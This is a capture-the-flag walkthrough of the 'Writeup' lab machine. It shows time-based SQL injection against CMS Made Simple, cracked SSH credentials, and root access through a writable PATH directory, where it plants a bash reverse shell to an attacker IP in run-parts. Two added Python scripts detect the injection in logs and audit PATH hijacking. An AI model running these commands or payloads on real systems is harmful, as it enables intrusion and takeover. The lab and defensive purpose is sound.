Learn to work with Writeup Box

Introduction

Time for a new blog. Today we're going to walk through the recently retired Linux machine Writeup. Although it was classified in the easy category, it was a bit tricky: getting the user flag was quite easy, but I got a bit stuck during the privilege escalation phase. So without further ado, let's begin...

Recon

We're going to start our reconnaissance with an Nmap scan.
nmap -sC -sV 10.10.10.138

As we can see port 80 is open, let's check that in our browser first.

As you can see from the text above, a DoS-protection script has been put in place, so we're not going to be fuzzing for folders and files here.
Returning to our Nmap scan, we can clearly see a disallowed entry, /writeup/, in the robots.txt file. Let's go to that page.

Let's try to see if we can get any clue from that source code.

Ok, so it looks like the page is built with the CMS Made Simple framework.


Exploitation

Going back to our terminal, let's use searchsploit to search for any available exploits:
searchsploit "CMS made simple"
Looks like there is an exploit for SQL injection; let's try it, since it affects all versions below 2.2.10. More details about this can be found here.
Let's look at the code once before we go further.
As per its description it is a time-based SQL injection, and we can also supply a password-cracking wordlist, so let's run the script along with our favorite password wordlist, rockyou.txt:
python <exploit script from searchsploit> -u http://10.10.10.138/writeup/ --crack -w rockyou.txt
So we've got the username and password successfully.
username: jkr
password: raykayjay9
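From the defender's side, the run above leaves a very recognisable trace: a blind, time-based injection has to send many requests from one source, each carrying a delay primitive (sleep(), benchmark(), pg_sleep(), WAITFOR DELAY) somewhere in the query string. The Python script below is an added example, not part of the original post or of the CMS Made Simple project: it parses Apache combined-format access log lines, URL-decodes the request path repeatedly to catch double encoding, strips inline SQL comments used to break up keywords, flags every request carrying a delay primitive, and counts hits per source address. The log lines, paths and addresses in it are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format); not taken from the original post.
# Three requests from one source carry a delay primitive in the query string, two are benign.
SAMPLE_LOG = """\
10.10.15.171 - - [07/Oct/2019:10:01:01 +0000] "GET /writeup/index.php?page=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.15.171 - - [07/Oct/2019:10:01:02 +0000] "GET /writeup/index.php?page=1%27+AND+SLEEP(5)--+ HTTP/1.1" 200 5123 "-" "python-requests/2.22.0"
10.10.15.171 - - [07/Oct/2019:10:01:08 +0000] "GET /writeup/index.php?page=1%27+AND+(SELECT+sleep/**/(5))--+ HTTP/1.1" 200 5123 "-" "python-requests/2.22.0"
10.10.15.171 - - [07/Oct/2019:10:01:14 +0000] "GET /writeup/index.php?page=1%2527%2520AND%2520BENCHMARK(5000000%252Cmd5(1))%252D%252D HTTP/1.1" 200 5123 "-" "python-requests/2.22.0"
10.10.14.5 - - [07/Oct/2019:10:02:00 +0000] "GET /writeup/index.php?page=about HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
"""

# Apache "combined" LogFormat: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Delay primitives used by blind, time-based injection across common database engines.
DELAY_RE = re.compile(
    r"\b(?:sleep|pg_sleep|benchmark|dbms_lock\.sleep)\s*\(|\bwaitfor\s+delay\b",
    re.IGNORECASE,
)


def normalize(raw_path):
    """URL-decode until the value stops changing (catches double encoding),
    then drop inline /* */ comments that are used to split keywords."""
    decoded = raw_path
    for _ in range(4):
        again = unquote_plus(decoded)
        if again == decoded:
            break
        decoded = again
    return re.sub(r"/\*.*?\*/", "", decoded)


def scan_access_log(text):
    """Return one finding per request whose decoded path carries a delay primitive."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format entry; skip rather than crash on junk
        normalized = normalize(m.group("path"))
        hit = DELAY_RE.search(normalized)
        if hit:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "ua": m.group("ua"),
                "primitive": hit.group(0),
                "path": normalized,
            })
    return findings


def per_source_counts(findings):
    """Flagged requests per source address; blind extraction needs many of them from one place."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['primitive']!r} {f['path']}")
    print(per_source_counts(found))
```

In production you would pair the signature hit with the response time (Apache can log it with the %D or %T LogFormat directives), since a time-based injection is literally visible as requests that take about as long as the injected delay, and alert on the per-source count rather than on a single hit.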
Now, recall that the ssh port (22) was also open. Let's use the credentials above. Type the ssh command below to log in to the server.
ssh jkr@10.10.10.138
Let's type the password as above and we should get our user flag in the current directory after logging in.

Privilege Escalation

Let's look for our root flag now. We can start by continuously monitoring the system with an excellent tool/script called pspy.

We can transfer it to the box either by scp or simply by hosting it on our own machine with Python's or Apache's web server. Let's run pspy right now...

Although there is a lot of information above, let's just look at the PATH variable there and the command run-parts running as UID 0. For those who don't know, PATH is just an environment variable in Linux and other Unix-like operating systems that tells the shell which directories to search for executable files in response to a user's commands.

Simply put, if we want to run an executable file, we go to the directory where it is present and run it by typing "./filename". However, if we want to run the file from any directory just by typing "filename" without the "./", the directory containing it must be in the PATH variable. More details can be found here.
Let's check where run-parts lives by typing "which run-parts", and also check the PATH variable by typing "echo $PATH".
This is what we have in the PATH variable.
Now the next step is to search for all the directories on the box that we can write to. Type in:
find / -type d -writable 2>/dev/null
Looks like the /usr/local/bin/ directory is writable and is also included in the PATH variable, so we can add our own run-parts file to that directory containing our reverse shell; when it is executed, it will send us a shell.
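The reasoning above is exactly the check a defender should automate: for every scheduled job, walk the PATH it runs with, in order, and ask whether any directory searched before the real binary can be written to by someone other than root. The Python script below is an added example, not code from the original post or from pspy: it resolves a command name through a PATH string the way the shell does, reports every group- or world-writable directory searched before the match (each one is a place where a same-named file would shadow the real binary, which is the run-parts situation on this box), and also flags whether the directory holding the real binary is itself writable. The demo() function builds a temporary layout mimicking the box, a writable usr_local_bin ahead of a usr_bin holding a stub run-parts; that layout and its permissions are constructed for the example, not taken from the machine.

```python
import os
import shutil
import stat
import tempfile


def path_entries(path_value):
    """Split a PATH string in search order; an empty entry means the current directory, as in the shell."""
    return [d if d else "." for d in path_value.split(":")]


def writable_by_others(directory):
    """True if the group- or world-write bit is set on the directory, i.e. someone other than its
    owner can create a file in it. The sticky bit only stops deleting other people's files, not adding new ones."""
    try:
        mode = os.stat(directory).st_mode
    except FileNotFoundError:
        return False  # a missing PATH entry cannot be written to (creating it is a separate question about the parent)
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_command(path_value, command):
    """Resolve `command` through `path_value` the way the shell does and report hijack opportunities.

    Returns a dict with:
      resolved_in            directory that actually supplies the command (None if not found)
      shadowing_dirs         writable directories searched *before* that one; a same-named file there wins
      resolved_dir_writable  whether the directory holding the real binary can itself be written by others
    """
    shadowing = []
    for directory in path_entries(path_value):
        candidate = os.path.join(directory, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return {
                "resolved_in": directory,
                "shadowing_dirs": shadowing,
                "resolved_dir_writable": writable_by_others(directory),
            }
        if writable_by_others(directory):
            shadowing.append(directory)
    return {"resolved_in": None, "shadowing_dirs": shadowing, "resolved_dir_writable": False}


def demo():
    """Constructed layout (not the real box): a group-writable usr_local_bin listed ahead of a
    usr_bin that holds a stub run-parts, mirroring the PATH order the post describes."""
    root = tempfile.mkdtemp(prefix="path_audit_")
    try:
        local_bin = os.path.join(root, "usr_local_bin")
        usr_bin = os.path.join(root, "usr_bin")
        os.mkdir(local_bin)
        os.chmod(local_bin, 0o775)  # group-writable: the weak setting
        os.mkdir(usr_bin)
        os.chmod(usr_bin, 0o755)    # only the owner may add files: the corrected setting
        real = os.path.join(usr_bin, "run-parts")
        with open(real, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")  # stand-in for the real binary
        os.chmod(real, 0o755)
        return audit_command(f"{local_bin}:{usr_bin}", "run-parts")
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    result = demo()
    print("run-parts resolves in:", result["resolved_in"])
    print("writable directories searched first:", result["shadowing_dirs"])
    print("directory of the real binary writable by others:", result["resolved_dir_writable"])
    # On a live system, feed in the PATH the job actually runs with (the one pspy showed for
    # cron) rather than your own shell's: audit_command(os.environ["PATH"], "run-parts")
```

Run it against the PATH the job actually uses, not your interactive shell's, since the two often differ. The fix for a finding like the one on this box is the same either way: every directory in root's search path should be root-owned with mode 755 or tighter, and a directory that other users can write to has no business appearing before the system ones, or in that PATH at all.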
Let's put our reverse shell in run-parts first and place it in /usr/local/bin/ by typing:
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.171/1234 0>&1'" > /usr/local/bin/run-parts
You can find a list of reverse shells at pentestmonkey.
Next, let's allow the file to be executed:
chmod 777 /usr/local/bin/run-parts
Now let's go to our other terminal and start a netcat listener on our port:
nc -lnvp 1234
All we have to do now is wait for our file to run automatically, which takes a few minutes depending on the box's traffic. If traffic is low, for VIP users in particular, you can simply open another terminal and log in to start another ssh session.
And we got our reverse shell as root after a few minutes.
Let's change to root's home directory and read the root.txt file.

That's how we got our root flag and successfully completed the challenge.
So for now, that's it. See you next time.